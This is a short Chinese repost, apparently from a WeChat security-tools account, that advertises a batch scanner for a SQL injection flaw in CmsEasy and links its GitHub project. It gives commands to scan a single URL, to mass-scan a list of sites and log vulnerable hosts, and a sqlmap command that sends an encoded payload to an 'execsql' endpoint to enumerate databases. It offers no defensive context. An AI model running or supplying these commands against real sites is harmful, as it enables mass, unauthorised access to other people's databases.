===================================
0x01 工具介绍
CmsEasy SQL注入漏洞批量扫描工具。
0x02 安装与使用
1、单个url测试
python3 cmseasy_sql_scan.py -u http://127.0.0.1:1111
2、批量检测 扫描结束后会在当前目录生成vuln.txt记录存在漏洞的url
python3 cmseasy_sql_scan.py -f url.txt
3、sql注入执行
python sqlmap.py -u "https://xxx.xxx.xxx.xxx/?case=crossall&act=execsql&sql=Ud-ZGLMFKBOhqavNJNK5WRCu9igJtYN1rVCO8hMFRM8NIKe6qmhRfWexXUiOqRN4aCe9aUie4Rtw5" --dbs
0x03 项目链接下载
https://github.com/MzzdToT/CmsEasy_sql
原文始发于微信公众号(Web安全工具库):CmsEasy SQL注入漏洞批量扫描工具
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论